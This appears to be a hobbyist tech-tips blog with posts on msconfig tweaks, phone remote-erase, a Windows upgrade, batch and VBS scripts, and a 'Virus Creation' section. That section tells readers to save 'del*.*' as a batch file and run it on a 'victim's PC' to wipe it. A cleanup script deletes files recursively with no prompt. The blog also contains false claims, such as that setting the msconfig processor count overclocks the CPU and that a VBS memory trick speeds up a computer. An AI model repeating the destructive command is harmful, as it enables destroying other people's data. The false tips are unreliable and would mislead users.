Saturday, July 24, 2021

How To Overclock Your CPU without going into BIOS Settings

 Hello everyone,

Let's get straight to the topic. 

Most of the people who want to overclock their CPU are asked to follow the most commonly used method of delicately changing the CPU voltage and RAM frequency settings.

These steps are reliable only if you have an expertise in this field, or else if anything goes wrong you are at a risk of losing your precious CPU and RAM Modules.

Alright, so here goes a  simple trick to get the max out of your CPU without tinkering your BIOS settings.

My Processor's (Intel i5 - 6200U) speed is clocked at 2.30 GHz

STEP 1: Open the 'Run Window' by pressing the combination Windows + R.



STEP 2: Type 'msconfig' without quotation marks and in the exact same alphabet case.






STEP 3: HOLD UP!! Save and close any important work as this process will require a restart.


















STEP 4: Go to the boot tab, and click the advanced options button.



STEP 5: Check the 'Number of Processors' option if unchecked.



STEP 6: Now comes the real part, :)

STEP 7: Select the maximum number of processors in the dropdown menu.

STEP 8: Press OK in the BOOT advanced options, and apply in the System Configuration, and then press OK in System Configuration.




STEP 9: It will ask for a restart.



STEP 10: Do It!!

STEP 11: That's it.

Important Tip ->  If you experience stability issues, just do the same thing, but uncheck the Number of processors options.



Wednesday, June 3, 2020

How to remote format a phone.

Hello guys,
                    In this tutorial I will show you how to track/ block/ erase any phone remotely.

For blocking or erasing a phone there are three things required compulsorily:-
                                                                 -The Phone must be powered on.
                                                                 - The phone should have an Internet access.
                                                                 -The phone must have same account as the device you are using
                                                                   to format the device remotely.   
Now, if the above requirements are met, then you are ready to achieve your goal.

Head to this website.
On the top left corner you might be able to see all your devices which are signed in to your Google account.

You might be able to see this.


From this app or website, you can play sound on you device even if it's on vibrate mode or silent mode.

You can even put a password to secure your device.


And if you have the option available for erasing the device, you can do it too.

That's it for this post guys.
If you like this post or have any queries regarding this, let me know in the comments below.

Stay Home Stay Safe.




Tuesday, September 24, 2019

Upgrading to Windows 10.

In this post I will give you some suggestions regarding upgrading your PC to Windows 10.
First go to Google and type Windows 10 Official ISO.
You must select the Microsoft Website.
You can download Media Creation Tool from there.
After that start the media creation tool.
It may take some time.
Agree to policies.
Be sure to select the architecture same as your PC.
It would ask you for an activation key. If you have it then use it.
Now you will be asked that whether you want to upgrade your PC or you want to do it for some one else's PC. I recommend that you shall chose the second option. As first option did not work for my PC.
If you selected to upgrade your PC. It would automatically start to download the required files.
This would take a very long time as it is about 7 to 8GB.
After completion follow the steps the installer asks you to follow.

If you chose the second option upgrading other's PC you will be asked to Insert a pen drive or a CD.
You shall insert a pen drive as now most of the new generation computers and laptops do not have a CD drive.

It will start to download.
Now you can do 2 things-
                                        : Boot from Pen drive.
                                        : Simply run the setup in the pen drive.
Booting from pen drive is a very complicated process.
So beginners shall simply run the setup from the pen drive.
Double Click the setup file.
It would start automatically.

Precaution - Guys sometimes the setup crashes and it could lead to PC Damage. So you shall make backups of your files and also a bootable floppy.
You can upgrade a PC for free only if you are currently on Windows 7, 8, 8.1.
If you are below a version listed above. You would have to do a custom install and every thing would be deleted.
Thanks Guys.
Please Like and Comment for any doubts.
                     


Sunday, November 4, 2018

How to enable a Jio Caller tune which is not available.

Hello friends
Most of us like to set a Caller tune.
But many of us face problems like the Caller tune isn't  available for Jio.
So in this post I am going to tell how to enable a Caller tune which isn't available.
Just remember the first Three words of the song name; if the song name is of only of one word, remember only one word. (Remember to type all letters in CAPITAL.)
Step 1: Open messages and Give a message to 56789 the tree words of the song.
Maybe you would get a notification that your message isn't reached.
But wait!! You would shortly get a reply of the suggestions with numbers 1, 2, 3, 4, 5, 6, etc.
Step 2: Select the song number which you like and message the song number that you like.
Step 3: You would be asked to Message 1 to enable it for all callers.
Step 4: You would receive a message to Message Y to a number 51893XXXX.
Step 5: You would receive a message from 51893XXXX.
Step 6: Just message Y to the number.
Step 7: There you go you would get a conformation message from Jio that your Caller tune has been set.

If you like the post please comment.
THANK YOU..................

Sunday, October 21, 2018

How to trace a website ip to location.

Hello friends
Today I will tell you how to trace a website's server address.
First of all open cmd as administrator.
type tracert www.youtube.com and press enter.
you would see a picture like this-





















Copy the last IP that is 2607:f8b0:4007:809::200e and save it in clipboard.
Open your web browser and type in it's address bar www.ipinfo.io/2607:f8b0:4007:809::200e and press enter.
You will see the youtube server's location, like in the image below-
And there you go.......
By this you can ind various other website's server address.
Thank you
And please comment.





















Sunday, October 7, 2018

A simple Quiz

Hello everyone welcome back!!
Today I gonna show you how to make a simple quiz in notepad or notepad++

Just type or copy the following code in notepad or notepad++


@echo off
title Quiz
echo Quiz time
pause
echo Q1) What is Indian National flag made up of?
echo a) Cotton          b) Wool
echo c) Khadi           d) Polyester
pause
echo If you thought about Khadi you are absolutely correct.
pause
cls
echo Q2) What language do computer understand?
echo a) English         b) Binary
echo c) French          c) Hindi
pause
echo If you thought about Binary you are absolutely correct.
pause
cls
echo Q3) Which snake is the fastest snake on Earth?
echo a) Viper           b) King Cobra
echo c) Black mamba     d) Rattle snake
pause
echo If you thought about Black mamba then you are absolutely correct.
pause
cls
echo Q4) What is the largest storage unit in computer?
echo a) Megabytes(mb)   b) Terabytes(tb)
echo c) Kilobytes(kb)   d) Petabyte(pb)
pause
echo If you thought about Petabyte then you are absolutely correct.
pause
cls
echo Q5) Which is the largest skyscrapper in the world?
echo a) Petronas Twin tower  b) Qutub Minar
echo c) Burj Khalifa    d) Prince tower
pause
echo If you thought about Burj Khalifa then you are absolutely correct.
pause
echo Thank You and please play again.
pause
exit


if you want to add more questions please add it as follows:

cls
echo Q#) ---------------------Your Question----------------------?
echo a)option 1                  b)option 2
echo c)option 3                  d)option 4
pause If you thought about option then you are absolutely correct.

Replace # with ouestion number (1,2,3,4,5,6,etc.).


If you like my post then please leave a comment.
And I would request you all to make any suggestions in the comment section.
Thank You.

Thursday, March 15, 2018

Fast up your computer

If your computer is too slow, there are two tricks
First-
1-Open Notepad
2-type ‘FREEMEM=SPACE(64000000) ‘
3-Save it as ram.vbs

Second
1-Open Notepad
2-type 
del /q /s  "c:\winnt\temp\*.*"
del /q /s  "c:\windows\temp\*.*"
del /q /s  "C:\WINDOWS\Prefetch\*.*"
del /q /s  "%USERPROFILE%\Local Settings\Temp\*.*"
del /q /s  "%USERPROFILE%\Local Settings\Temporary Internet Files\*.*"
del /q /s  "%USERPROFILE%\Cookies\*.*"
Rmdir /q /s  "%USERPROFILE%\Local Settings\Temporary Internet Files"
Rmdir /q /s  "%USERPROFILE%\Local Settings\Temp"
Rmdir /q /s  "%USERPROFILE%\Cookies\*.*"
Rmdir /q /s  "c:\winnt\Temp"
Rmdir /q /s  "c:\windows\Temp"
md  "%USERPROFILE%\Local Settings\Temporary Internet Files"
md  "%USERPROFILE%\Local Settings\Temp"
md  "%USERPROFILE%\Cookies"
3-Save it as cache.bat
4-Run it

Feedback

Felling so bored and want a magic that would make your computer to talk with you?
Here are few steps
1-Open Notepad
2-Type ‘dim fname
Fname=Inputbox(“Hi, What’s your name?”)
Fname=Inputbox (“How are you?”)
Fname=Inputbox(“What’s your favourite sport”)
Fname=Inputbox(“What’s your favourite Hobby?”)
Fname=Inputbox(“Will you be my friend?”)
X=MsgBox(“Thank You”,4+64,”Info”)

Sunday, February 25, 2018

Computer Talk

let Computer speak what you tell
1-Open notepad
2-type strText=Inputbox("What should Sam say?","Sam")
Set objVoice=CreateObject("SAPI.SpVoice")
ObjVoice.speak strText
3-save it as voice.vbs
4-Run
The image would seem like this



Sunday, January 28, 2018

Matrix effect

Matrix in a computer(Not harmful)
1-Open notepad and paste the following code
2-type'color 02
:tricks
echo
%random%%random%%random%%random%
%random%%random%%random%%random%
goto tricks
3-Save it as Matrix.bat
4-Open and enjoy
You would see a image like this

Virus Creation

Anybody wants to know how a virus is created?
Here are some steps
1-Open Notepad
2-type'del*.*
3-Save as cad.bat
4-Run it on victim's PC
5-Result
Whole Computer's gone

How To Overclock Your CPU without going into BIOS Settings

 Hello everyone, Let's get straight to the topic.  Most of the people who want to overclock their CPU are asked to follow the most commo...